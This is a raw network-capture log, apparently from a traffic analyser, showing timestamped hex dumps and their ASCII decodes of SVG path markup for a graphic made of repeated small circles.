                                                                                                                                                                                                                                                                    2023-07-27 19:45:19 UTC1353INData Raw: 39 2c 30 2c 30 2c 31 2d 33 2e 37 31 2d 31 2e 30 35 2c 32 2e 36 36 2c 32 2e 36 36 2c 30 2c 30 2c 31 2c 2e 35 37 2d 33 2e 32 31 2c 32 2e 35 2c 32 2e 35 2c 30 2c 30 2c 31 2c 33 2e 32 32 2c 30 2c 32 2e 33 36 2c 32 2e 33 36 2c 30 2c 30 2c 31 2c 2e 31 38 2c 33 2e 31 37 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 37 22 20 64 3d 22 4d 35 39 31 2e 34 39 2c 32 33 34 61 31 2e 39 32 2c 31 2e 39 32 2c 30 2c 30 2c 31 2d 2e 38 37 2c 32 2e 34 39 2c 32 2e 37 38 2c 32 2e 37 38 2c 30 2c 30 2c 31 2d 33 2e 37 31 2d 31 2e 30 35 2c 32 2e 36 37 2c 32 2e 36 37 2c 30 2c 30 2c 31 2c 2e 35 37 2d 33 2e 32 31 2c 32 2e 35 31 2c 32 2e 35 31 2c 30 2c 30 2c 31 2c 33 2e 32 32 2c 30 2c 32 2e 33 36 2c 32 2e 33 36 2c 30 2c 30 2c 31 2c 2e 31 37 2c 33 2e 31 38 22 2f 3e 3c 70 61
                                                                                                                                                                                                                                                                    Data Ascii: 9,0,0,1-3.71-1.05,2.66,2.66,0,0,1,.57-3.21,2.5,2.5,0,0,1,3.22,0,2.36,2.36,0,0,1,.18,3.17"/><path class="cls-7" d="M591.49,234a1.92,1.92,0,0,1-.87,2.49,2.78,2.78,0,0,1-3.71-1.05,2.67,2.67,0,0,1,.57-3.21,2.51,2.51,0,0,1,3.22,0,2.36,2.36,0,0,1,.17,3.18"/><pa
                                                                                                                                                                                                                                                                    2023-07-27 19:45:19 UTC1369INData Raw: 31 2c 2e 35 37 2d 33 2e 32 31 2c 32 2e 35 2c 32 2e 35 2c 30 2c 30 2c 31 2c 33 2e 32 32 2c 30 2c 32 2e 33 36 2c 32 2e 33 36 2c 30 2c 30 2c 31 2c 2e 31 37 2c 33 2e 31 38 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 37 22 20 64 3d 22 4d 36 31 30 2e 33 31 2c 39 34 2e 33 36 61 31 2e 39 31 2c 31 2e 39 31 2c 30 2c 30 2c 31 2d 2e 38 37 2c 32 2e 34 38 2c 32 2e 37 38 2c 32 2e 37 38 2c 30 2c 30 2c 31 2d 33 2e 37 31 2d 31 2c 32 2e 36 37 2c 32 2e 36 37 2c 30 2c 30 2c 31 2c 2e 35 37 2d 33 2e 32 31 2c 32 2e 35 31 2c 32 2e 35 31 2c 30 2c 30 2c 31 2c 33 2e 32 32 2c 30 2c 32 2e 33 36 2c 32 2e 33 36 2c 30 2c 30 2c 31 2c 2e 31 37 2c 33 2e 31 38 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 37 22 20 64 3d 22 4d 36 31 30 2e 30 35 2c 38 36 2e 36 34
                                                                                                                                                                                                                                                                    Data Ascii: 1,.57-3.21,2.5,2.5,0,0,1,3.22,0,2.36,2.36,0,0,1,.17,3.18"/><path class="cls-7" d="M610.31,94.36a1.91,1.91,0,0,1-.87,2.48,2.78,2.78,0,0,1-3.71-1,2.67,2.67,0,0,1,.57-3.21,2.51,2.51,0,0,1,3.22,0,2.36,2.36,0,0,1,.17,3.18"/><path class="cls-7" d="M610.05,86.64
                                                                                                                                                                                                                                                                    2023-07-27 19:45:19 UTC1385INData Raw: 36 2c 32 2e 33 36 2c 30 2c 30 2c 31 2c 2e 31 37 2c 33 2e 31 38 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 37 22 20 64 3d 22 4d 36 34 34 2e 32 38 2c 31 37 30 2e 34 36 61 31 2e 39 31 2c 31 2e 39 31 2c 30 2c 30 2c 31 2d 2e 38 37 2c 32 2e 34 38 2c 32 2e 37 39 2c 32 2e 37 39 2c 30 2c 30 2c 31 2d 33 2e 37 31 2d 31 2c 32 2e 36 38 2c 32 2e 36 38 2c 30 2c 30 2c 31 2c 2e 35 37 2d 33 2e 32 32 2c 32 2e 35 31 2c 32 2e 35 31 2c 30 2c 30 2c 31 2c 33 2e 32 32 2c 30 2c 32 2e 33 36 2c 32 2e 33 36 2c 30 2c 30 2c 31 2c 2e 31 37 2c 33 2e 31 38 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 37 22 20 64 3d 22 4d 36 34 34 2c 31 36 32 2e 37 34 61 31 2e 39 32 2c 31 2e 39 32 2c 30 2c 30 2c 31 2d 2e 38 37 2c 32 2e 34 39 2c 32 2e 37 39 2c 32 2e 37 39 2c
                                                                                                                                                                                                                                                                    Data Ascii: 6,2.36,0,0,1,.17,3.18"/><path class="cls-7" d="M644.28,170.46a1.91,1.91,0,0,1-.87,2.48,2.79,2.79,0,0,1-3.71-1,2.68,2.68,0,0,1,.57-3.22,2.51,2.51,0,0,1,3.22,0,2.36,2.36,0,0,1,.17,3.18"/><path class="cls-7" d="M644,162.74a1.92,1.92,0,0,1-.87,2.49,2.79,2.79,
                                                                                                                                                                                                                                                                    2023-07-27 19:45:19 UTC1401INData Raw: 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 37 22 20 64 3d 22 4d 36 37 38 2e 32 35 2c 32 34 36 2e 35 36 61 31 2e 39 32 2c 31 2e 39 32 2c 30 2c 30 2c 31 2d 2e 38 37 2c 32 2e 34 39 2c 32 2e 38 2c 32 2e 38 2c 30 2c 30 2c 31 2d 33 2e 37 31 2d 31 2e 30 35 2c 32 2e 36 36 2c 32 2e 36 36 2c 30 2c 30 2c 31 2c 2e 35 37 2d 33 2e 32 31 2c 32 2e 35 2c 32 2e 35 2c 30 2c 30 2c 31 2c 33 2e 32 32 2c 30 2c 32 2e 33 36 2c 32 2e 33 36 2c 30 2c 30 2c 31 2c 2e 31 37 2c 33 2e 31 38 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 37 22 20 64 3d 22 4d 36 37 38 2c 32 33 38 2e 38 34 61 31 2e 39 32 2c 31 2e 39 32 2c 30 2c 30 2c 31 2d 2e 38 37 2c 32 2e 34 39 2c 32 2e 37 39 2c 32 2e 37 39 2c 30 2c 30 2c 31 2d 33 2e 37 31 2d 31 2e 30 35 2c 32 2e 36 36 2c 32
                                                                                                                                                                                                                                                                    Data Ascii: "/><path class="cls-7" d="M678.25,246.56a1.92,1.92,0,0,1-.87,2.49,2.8,2.8,0,0,1-3.71-1.05,2.66,2.66,0,0,1,.57-3.21,2.5,2.5,0,0,1,3.22,0,2.36,2.36,0,0,1,.17,3.18"/><path class="cls-7" d="M678,238.84a1.92,1.92,0,0,1-.87,2.49,2.79,2.79,0,0,1-3.71-1.05,2.66,2
                                                                                                                                                                                                                                                                    2023-07-27 19:45:19 UTC1417INData Raw: 61 31 2e 39 32 2c 31 2e 39 32 2c 30 2c 30 2c 31 2d 2e 38 37 2c 32 2e 34 39 2c 32 2e 38 2c 32 2e 38 2c 30 2c 30 2c 31 2d 33 2e 37 31 2d 31 2c 32 2e 36 36 2c 32 2e 36 36 2c 30 2c 30 2c 31 2c 2e 35 37 2d 33 2e 32 31 2c 32 2e 35 2c 32 2e 35 2c 30 2c 30 2c 31 2c 33 2e 32 32 2c 30 2c 32 2e 33 36 2c 32 2e 33 36 2c 30 2c 30 2c 31 2c 2e 31 37 2c 33 2e 31 38 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 37 22 20 64 3d 22 4d 36 39 36 2e 38 31 2c 39 39 2e 31 35 61 31 2e 39 32 2c 31 2e 39 32 2c 30 2c 30 2c 31 2d 2e 38 37 2c 32 2e 34 39 2c 32 2e 37 39 2c 32 2e 37 39 2c 30 2c 30 2c 31 2d 33 2e 37 31 2d 31 2c 32 2e 36 38 2c 32 2e 36 38 2c 30 2c 30 2c 31 2c 2e 35 36 2d 33 2e 32 31 2c 32 2e 35 32 2c 32 2e 35 32 2c 30 2c 30 2c 31 2c 33 2e 32 33 2c 30 2c 32 2e
                                                                                                                                                                                                                                                                    Data Ascii: a1.92,1.92,0,0,1-.87,2.49,2.8,2.8,0,0,1-3.71-1,2.66,2.66,0,0,1,.57-3.21,2.5,2.5,0,0,1,3.22,0,2.36,2.36,0,0,1,.17,3.18"/><path class="cls-7" d="M696.81,99.15a1.92,1.92,0,0,1-.87,2.49,2.79,2.79,0,0,1-3.71-1,2.68,2.68,0,0,1,.56-3.21,2.52,2.52,0,0,1,3.23,0,2.
                                                                                                                                                                                                                                                                    2023-07-27 19:45:19 UTC1433INData Raw: 31 2e 30 35 2c 32 2e 36 36 2c 32 2e 36 36 2c 30 2c 30 2c 31 2c 2e 35 37 2d 33 2e 32 31 2c 32 2e 35 2c 32 2e 35 2c 30 2c 30 2c 31 2c 33 2e 32 32 2c 30 2c 32 2e 33 36 2c 32 2e 33 36 2c 30 2c 30 2c 31 2c 2e 31 37 2c 33 2e 31 38 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 37 22 20 64 3d 22 4d 37 33 30 2e 37 38 2c 31 37 35 2e 32 36 61 31 2e 39 31 2c 31 2e 39 31 2c 30 2c 30 2c 31 2d 2e 38 37 2c 32 2e 34 38 2c 32 2e 37 38 2c 32 2e 37 38 2c 30 2c 30 2c 31 2d 33 2e 37 31 2d 31 2e 30 35 2c 32 2e 36 38 2c 32 2e 36 38 2c 30 2c 30 2c 31 2c 2e 35 36 2d 33 2e 32 31 2c 32 2e 35 32 2c 32 2e 35 32 2c 30 2c 30 2c 31 2c 33 2e 32 33 2c 30 2c 32 2e 33 36 2c 32 2e 33 36 2c 30 2c 30 2c 31 2c 2e 31 37 2c 33 2e 31 38 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22
                                                                                                                                                                                                                                                                    Data Ascii: 1.05,2.66,2.66,0,0,1,.57-3.21,2.5,2.5,0,0,1,3.22,0,2.36,2.36,0,0,1,.17,3.18"/><path class="cls-7" d="M730.78,175.26a1.91,1.91,0,0,1-.87,2.48,2.78,2.78,0,0,1-3.71-1.05,2.68,2.68,0,0,1,.56-3.21,2.52,2.52,0,0,1,3.23,0,2.36,2.36,0,0,1,.17,3.18"/><path class="
                                                                                                                                                                                                                                                                    2023-07-27 19:45:19 UTC1449INData Raw: 32 32 2c 30 2c 32 2e 33 36 2c 32 2e 33 36 2c 30 2c 30 2c 31 2c 2e 31 37 2c 33 2e 31 38 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 37 22 20 64 3d 22 4d 37 36 34 2e 37 35 2c 32 35 31 2e 33 36 61 31 2e 39 31 2c 31 2e 39 31 2c 30 2c 30 2c 31 2d 2e 38 37 2c 32 2e 34 38 2c 32 2e 37 39 2c 32 2e 37 39 2c 30 2c 30 2c 31 2d 33 2e 37 31 2d 31 2c 32 2e 36 38 2c 32 2e 36 38 2c 30 2c 30 2c 31 2c 2e 35 37 2d 33 2e 32 32 2c 32 2e 35 31 2c 32 2e 35 31 2c 30 2c 30 2c 31 2c 33 2e 32 32 2c 30 2c 32 2e 33 36 2c 32 2e 33 36 2c 30 2c 30 2c 31 2c 2e 31 37 2c 33 2e 31 38 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 37 22 20 64 3d 22 4d 37 36 34 2e 34 39 2c 32 34 33 2e 36 34 61 31 2e 39 32 2c 31 2e 39 32 2c 30 2c 30 2c 31 2d 2e 38 37 2c 32 2e 34 39
                                                                                                                                                                                                                                                                    Data Ascii: 22,0,2.36,2.36,0,0,1,.17,3.18"/><path class="cls-7" d="M764.75,251.36a1.91,1.91,0,0,1-.87,2.48,2.79,2.79,0,0,1-3.71-1,2.68,2.68,0,0,1,.57-3.22,2.51,2.51,0,0,1,3.22,0,2.36,2.36,0,0,1,.17,3.18"/><path class="cls-7" d="M764.49,243.64a1.92,1.92,0,0,1-.87,2.49
                                                                                                                                                                                                                                                                    2023-07-27 19:45:19 UTC1465INData Raw: 2e 31 33 2d 31 2e 33 36 2c 33 2c 33 2c 30 2c 30 2c 31 2c 2e 38 2d 33 2e 35 38 2c 32 2e 38 32 2c 32 2e 38 32 2c 30 2c 30 2c 31 2c 33 2e 36 32 2e 32 2c 32 2e 36 36 2c 32 2e 36 36 2c 30 2c 30 2c 31 2c 30 2c 33 2e 35 38 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 36 35 33 2e 34 32 2c 32 35 39 2e 35 34 61 32 2e 31 36 2c 32 2e 31 36 2c 30 2c 30 2c 31 2d 31 2e 31 2c 32 2e 37 35 2c 33 2e 31 35 2c 33 2e 31 35 2c 30 2c 30 2c 31 2d 34 2e 31 32 2d 31 2e 33 36 2c 33 2c 33 2c 30 2c 30 2c 31 2c 2e 37 39 2d 33 2e 35 38 2c 32 2e 38 32 2c 32 2e 38 32 2c 30 2c 30 2c 31 2c 33 2e 36 32 2e 32 2c 32 2e 36 36 2c 32 2e 36 36 2c 30 2c 30 2c 31 2c 30 2c 33 2e 35 38 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d
                                                                                                                                                                                                                                                                    Data Ascii: .13-1.36,3,3,0,0,1,.8-3.58,2.82,2.82,0,0,1,3.62.2,2.66,2.66,0,0,1,0,3.58"/><path class="cls-9" d="M653.42,259.54a2.16,2.16,0,0,1-1.1,2.75,3.15,3.15,0,0,1-4.12-1.36,3,3,0,0,1,.79-3.58,2.82,2.82,0,0,1,3.62.2,2.66,2.66,0,0,1,0,3.58"/><path class="cls-9" d="M
                                                                                                                                                                                                                                                                    2023-07-27 19:45:19 UTC1481INData Raw: 2d 34 2e 31 32 2d 31 2e 33 36 2c 33 2c 33 2c 30 2c 30 2c 31 2c 2e 37 39 2d 33 2e 35 38 2c 32 2e 38 33 2c 32 2e 38 33 2c 30 2c 30 2c 31 2c 33 2e 36 32 2e 32 2c 32 2e 36 35 2c 32 2e 36 35 2c 30 2c 30 2c 31 2c 30 2c 33 2e 35 38 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 36 38 38 2e 31 35 2c 33 32 30 2e 36 31 61 32 2e 31 35 2c 32 2e 31 35 2c 30 2c 30 2c 31 2d 31 2e 30 39 2c 32 2e 37 35 2c 33 2e 31 34 2c 33 2e 31 34 2c 30 2c 30 2c 31 2d 34 2e 31 32 2d 31 2e 33 36 2c 33 2c 33 2c 30 2c 30 2c 31 2c 2e 37 39 2d 33 2e 35 38 2c 32 2e 38 33 2c 32 2e 38 33 2c 30 2c 30 2c 31 2c 33 2e 36 32 2e 32 2c 32 2e 36 36 2c 32 2e 36 36 2c 30 2c 30 2c 31 2c 30 2c 33 2e 35 38 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20
                                                                                                                                                                                                                                                                    Data Ascii: -4.12-1.36,3,3,0,0,1,.79-3.58,2.83,2.83,0,0,1,3.62.2,2.65,2.65,0,0,1,0,3.58"/><path class="cls-9" d="M688.15,320.61a2.15,2.15,0,0,1-1.09,2.75,3.14,3.14,0,0,1-4.12-1.36,3,3,0,0,1,.79-3.58,2.83,2.83,0,0,1,3.62.2,2.66,2.66,0,0,1,0,3.58"/><path class="cls-9"
                                                                                                                                                                                                                                                                    2023-07-27 19:45:19 UTC1497INData Raw: 2c 30 2c 30 2c 31 2c 2e 38 2d 33 2e 35 38 2c 32 2e 38 32 2c 32 2e 38 32 2c 30 2c 30 2c 31 2c 33 2e 36 32 2e 32 2c 32 2e 36 36 2c 32 2e 36 36 2c 30 2c 30 2c 31 2c 30 2c 33 2e 35 38 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 37 32 32 2e 38 39 2c 33 38 31 2e 36 38 61 32 2e 31 36 2c 32 2e 31 36 2c 30 2c 30 2c 31 2d 31 2e 31 2c 32 2e 37 35 2c 33 2e 31 34 2c 33 2e 31 34 2c 30 2c 30 2c 31 2d 34 2e 31 32 2d 31 2e 33 35 2c 33 2c 33 2c 30 2c 30 2c 31 2c 2e 37 39 2d 33 2e 35 38 2c 32 2e 38 31 2c 32 2e 38 31 2c 30 2c 30 2c 31 2c 33 2e 36 32 2e 32 2c 32 2e 36 36 2c 32 2e 36 36 2c 30 2c 30 2c 31 2c 30 2c 33 2e 35 38 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 37 32 33 2c 33 37 33 61 32 2e 31 36
                                                                                                                                                                                                                                                                    Data Ascii: ,0,0,1,.8-3.58,2.82,2.82,0,0,1,3.62.2,2.66,2.66,0,0,1,0,3.58"/><path class="cls-9" d="M722.89,381.68a2.16,2.16,0,0,1-1.1,2.75,3.14,3.14,0,0,1-4.12-1.35,3,3,0,0,1,.79-3.58,2.81,2.81,0,0,1,3.62.2,2.66,2.66,0,0,1,0,3.58"/><path class="cls-9" d="M723,373a2.16
                                                                                                                                                                                                                                                                    2023-07-27 19:45:19 UTC1513INData Raw: 2c 31 2c 33 2e 36 32 2e 32 2c 32 2e 36 36 2c 32 2e 36 36 2c 30 2c 30 2c 31 2c 30 2c 33 2e 35 38 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 37 35 37 2e 36 32 2c 34 34 32 2e 37 36 61 32 2e 31 34 2c 32 2e 31 34 2c 30 2c 30 2c 31 2d 31 2e 30 39 2c 32 2e 37 35 2c 33 2e 31 34 2c 33 2e 31 34 2c 30 2c 30 2c 31 2d 34 2e 31 32 2d 31 2e 33 36 2c 33 2c 33 2c 30 2c 30 2c 31 2c 2e 37 39 2d 33 2e 35 38 2c 32 2e 38 33 2c 32 2e 38 33 2c 30 2c 30 2c 31 2c 33 2e 36 32 2e 32 2c 32 2e 36 35 2c 32 2e 36 35 2c 30 2c 30 2c 31 2c 30 2c 33 2e 35 38 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 37 35 37 2e 37 2c 34 33 34 2e 30 38 61 32 2e 31 35 2c 32 2e 31 35 2c 30 2c 30 2c 31 2d 31 2e 30 39 2c 32 2e 37 35 2c
                                                                                                                                                                                                                                                                    Data Ascii: ,1,3.62.2,2.66,2.66,0,0,1,0,3.58"/><path class="cls-9" d="M757.62,442.76a2.14,2.14,0,0,1-1.09,2.75,3.14,3.14,0,0,1-4.12-1.36,3,3,0,0,1,.79-3.58,2.83,2.83,0,0,1,3.62.2,2.65,2.65,0,0,1,0,3.58"/><path class="cls-9" d="M757.7,434.08a2.15,2.15,0,0,1-1.09,2.75,
                                                                                                                                                                                                                                                                    2023-07-27 19:45:19 UTC1529INData Raw: 32 2e 36 35 2c 32 2e 36 35 2c 30 2c 30 2c 31 2c 30 2c 33 2e 35 38 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 37 38 35 2e 37 2c 32 36 30 2e 37 31 61 32 2e 31 35 2c 32 2e 31 35 2c 30 2c 30 2c 31 2d 31 2e 30 39 2c 32 2e 37 35 2c 33 2e 31 35 2c 33 2e 31 35 2c 30 2c 30 2c 31 2d 34 2e 31 33 2d 31 2e 33 35 2c 33 2c 33 2c 30 2c 30 2c 31 2c 2e 38 2d 33 2e 35 38 2c 32 2e 38 31 2c 32 2e 38 31 2c 30 2c 30 2c 31 2c 33 2e 36 32 2e 31 39 2c 32 2e 36 36 2c 32 2e 36 36 2c 30 2c 30 2c 31 2c 30 2c 33 2e 35 38 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 37 38 35 2e 37 38 2c 32 35 32 61 32 2e 31 36 2c 32 2e 31 36 2c 30 2c 30 2c 31 2d 31 2e 31 2c 32 2e 37 35 2c 33 2e 31 34 2c 33 2e 31 34 2c 30 2c 30 2c
                                                                                                                                                                                                                                                                    Data Ascii: 2.65,2.65,0,0,1,0,3.58"/><path class="cls-9" d="M785.7,260.71a2.15,2.15,0,0,1-1.09,2.75,3.15,3.15,0,0,1-4.13-1.35,3,3,0,0,1,.8-3.58,2.81,2.81,0,0,1,3.62.19,2.66,2.66,0,0,1,0,3.58"/><path class="cls-9" d="M785.78,252a2.16,2.16,0,0,1-1.1,2.75,3.14,3.14,0,0,
                                                                                                                                                                                                                                                                    2023-07-27 19:45:19 UTC1545INData Raw: 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 38 32 30 2e 34 34 2c 33 32 31 2e 37 38 61 32 2e 31 36 2c 32 2e 31 36 2c 30 2c 30 2c 31 2d 31 2e 31 2c 32 2e 37 36 2c 33 2e 31 35 2c 33 2e 31 35 2c 30 2c 30 2c 31 2d 34 2e 31 32 2d 31 2e 33 36 2c 33 2c 33 2c 30 2c 30 2c 31 2c 2e 37 39 2d 33 2e 35 38 2c 32 2e 38 32 2c 32 2e 38 32 2c 30 2c 30 2c 31 2c 33 2e 36 32 2e 32 2c 32 2e 36 36 2c 32 2e 36 36 2c 30 2c 30 2c 31 2c 30 2c 33 2e 35 38 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 38 32 30 2e 35 31 2c 33 31 33 2e 31 61 32 2e 31 35 2c 32 2e 31 35 2c 30 2c 30 2c 31 2d 31 2e 30 39 2c 32 2e 37 36 2c 33 2e 31 35 2c 33 2e 31 35 2c 30 2c 30 2c 31 2d 34 2e 31 32 2d 31 2e 33 36 2c 33 2c 33 2c 30 2c 30 2c 31 2c 2e 37
                                                                                                                                                                                                                                                                    Data Ascii: ath class="cls-9" d="M820.44,321.78a2.16,2.16,0,0,1-1.1,2.76,3.15,3.15,0,0,1-4.12-1.36,3,3,0,0,1,.79-3.58,2.82,2.82,0,0,1,3.62.2,2.66,2.66,0,0,1,0,3.58"/><path class="cls-9" d="M820.51,313.1a2.15,2.15,0,0,1-1.09,2.76,3.15,3.15,0,0,1-4.12-1.36,3,3,0,0,1,.7
                                                                                                                                                                                                                                                                    2023-07-27 19:45:19 UTC1561INData Raw: 22 4d 38 35 35 2e 31 37 2c 33 38 32 2e 38 36 61 32 2e 31 35 2c 32 2e 31 35 2c 30 2c 30 2c 31 2d 31 2e 30 39 2c 32 2e 37 35 2c 33 2e 31 34 2c 33 2e 31 34 2c 30 2c 30 2c 31 2d 34 2e 31 32 2d 31 2e 33 36 2c 33 2c 33 2c 30 2c 30 2c 31 2c 2e 37 39 2d 33 2e 35 38 2c 32 2e 38 33 2c 32 2e 38 33 2c 30 2c 30 2c 31 2c 33 2e 36 32 2e 32 2c 32 2e 36 36 2c 32 2e 36 36 2c 30 2c 30 2c 31 2c 30 2c 33 2e 35 38 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 38 35 35 2e 32 35 2c 33 37 34 2e 31 38 61 32 2e 31 35 2c 32 2e 31 35 2c 30 2c 30 2c 31 2d 31 2e 30 39 2c 32 2e 37 35 2c 33 2e 31 36 2c 33 2e 31 36 2c 30 2c 30 2c 31 2d 34 2e 31 33 2d 31 2e 33 36 2c 33 2c 33 2c 30 2c 30 2c 31 2c 2e 38 2d 33 2e 35 38 2c 32 2e 38 33 2c 32 2e 38 33 2c 30 2c
                                                                                                                                                                                                                                                                    Data Ascii: "M855.17,382.86a2.15,2.15,0,0,1-1.09,2.75,3.14,3.14,0,0,1-4.12-1.36,3,3,0,0,1,.79-3.58,2.83,2.83,0,0,1,3.62.2,2.66,2.66,0,0,1,0,3.58"/><path class="cls-9" d="M855.25,374.18a2.15,2.15,0,0,1-1.09,2.75,3.16,3.16,0,0,1-4.13-1.36,3,3,0,0,1,.8-3.58,2.83,2.83,0,
                                                                                                                                                                                                                                                                    2023-07-27 19:45:19 UTC1577INData Raw: 2e 31 2c 32 2e 37 35 2c 33 2e 31 34 2c 33 2e 31 34 2c 30 2c 30 2c 31 2d 34 2e 31 32 2d 31 2e 33 35 2c 33 2c 33 2c 30 2c 30 2c 31 2c 2e 38 2d 33 2e 35 38 2c 32 2e 38 2c 32 2e 38 2c 30 2c 30 2c 31 2c 33 2e 36 31 2e 32 2c 32 2e 36 34 2c 32 2e 36 34 2c 30 2c 30 2c 31 2c 30 2c 33 2e 35 37 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 38 39 30 2c 34 33 35 2e 32 35 61 32 2e 31 36 2c 32 2e 31 36 2c 30 2c 30 2c 31 2d 31 2e 31 2c 32 2e 37 35 2c 33 2e 31 34 2c 33 2e 31 34 2c 30 2c 30 2c 31 2d 34 2e 31 32 2d 31 2e 33 35 2c 33 2c 33 2c 30 2c 30 2c 31 2c 2e 37 39 2d 33 2e 35 38 2c 32 2e 38 32 2c 32 2e 38 32 2c 30 2c 30 2c 31 2c 33 2e 36 32 2e 32 2c 32 2e 36 33 2c 32 2e 36 33 2c 30 2c 30 2c 31 2c 30 2c 33 2e 35 37 22 2f 3e 3c 70 61 74
                                                                                                                                                                                                                                                                    Data Ascii: .1,2.75,3.14,3.14,0,0,1-4.12-1.35,3,3,0,0,1,.8-3.58,2.8,2.8,0,0,1,3.61.2,2.64,2.64,0,0,1,0,3.57"/><path class="cls-9" d="M890,435.25a2.16,2.16,0,0,1-1.1,2.75,3.14,3.14,0,0,1-4.12-1.35,3,3,0,0,1,.79-3.58,2.82,2.82,0,0,1,3.62.2,2.63,2.63,0,0,1,0,3.57"/><pat
                                                                                                                                                                                                                                                                    2023-07-27 19:45:19 UTC1593INData Raw: 30 2c 31 2d 31 2e 31 2c 32 2e 37 35 2c 33 2e 31 34 2c 33 2e 31 34 2c 30 2c 30 2c 31 2d 34 2e 31 32 2d 31 2e 33 36 2c 33 2c 33 2c 30 2c 30 2c 31 2c 2e 37 39 2d 33 2e 35 38 2c 32 2e 38 33 2c 32 2e 38 33 2c 30 2c 30 2c 31 2c 33 2e 36 32 2e 32 2c 32 2e 36 35 2c 32 2e 36 35 2c 30 2c 30 2c 31 2c 30 2c 33 2e 35 38 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 39 31 38 2e 30 36 2c 32 35 33 2e 32 31 41 32 2e 31 35 2c 32 2e 31 35 2c 30 2c 30 2c 31 2c 39 31 37 2c 32 35 36 61 33 2e 31 34 2c 33 2e 31 34 2c 30 2c 30 2c 31 2d 34 2e 31 32 2d 31 2e 33 36 2c 33 2c 33 2c 30 2c 30 2c 31 2c 2e 37 39 2d 33 2e 35 38 2c 32 2e 38 33 2c 32 2e 38 33 2c 30 2c 30 2c 31 2c 33 2e 36 32 2e 32 2c 32 2e 36 36 2c 32 2e 36 36 2c 30 2c 30 2c 31 2c 30 2c 33
                                                                                                                                                                                                                                                                    Data Ascii: 0,1-1.1,2.75,3.14,3.14,0,0,1-4.12-1.36,3,3,0,0,1,.79-3.58,2.83,2.83,0,0,1,3.62.2,2.65,2.65,0,0,1,0,3.58"/><path class="cls-9" d="M918.06,253.21A2.15,2.15,0,0,1,917,256a3.14,3.14,0,0,1-4.12-1.36,3,3,0,0,1,.79-3.58,2.83,2.83,0,0,1,3.62.2,2.66,2.66,0,0,1,0,3
                                                                                                                                                                                                                                                                    2023-07-27 19:45:19 UTC1609INData Raw: 2c 30 2c 30 2c 31 2d 34 2e 31 33 2d 31 2e 33 35 2c 33 2c 33 2c 30 2c 30 2c 31 2c 2e 38 2d 33 2e 35 38 2c 32 2e 38 31 2c 32 2e 38 31 2c 30 2c 30 2c 31 2c 33 2e 36 32 2e 31 39 2c 32 2e 36 36 2c 32 2e 36 36 2c 30 2c 30 2c 31 2c 30 2c 33 2e 35 38 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 39 35 32 2e 38 2c 33 31 34 2e 32 38 61 32 2e 31 36 2c 32 2e 31 36 2c 30 2c 30 2c 31 2d 31 2e 31 2c 32 2e 37 35 2c 33 2e 31 34 2c 33 2e 31 34 2c 30 2c 30 2c 31 2d 34 2e 31 32 2d 31 2e 33 35 2c 33 2c 33 2c 30 2c 30 2c 31 2c 2e 38 2d 33 2e 35 38 2c 32 2e 38 2c 32 2e 38 2c 30 2c 30 2c 31 2c 33 2e 36 31 2e 31 39 2c 32 2e 36 36 2c 32 2e 36 36 2c 30 2c 30 2c 31 2c 30 2c 33 2e 35 38 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39
                                                                                                                                                                                                                                                                    Data Ascii: ,0,0,1-4.13-1.35,3,3,0,0,1,.8-3.58,2.81,2.81,0,0,1,3.62.19,2.66,2.66,0,0,1,0,3.58"/><path class="cls-9" d="M952.8,314.28a2.16,2.16,0,0,1-1.1,2.75,3.14,3.14,0,0,1-4.12-1.35,3,3,0,0,1,.8-3.58,2.8,2.8,0,0,1,3.61.19,2.66,2.66,0,0,1,0,3.58"/><path class="cls-9
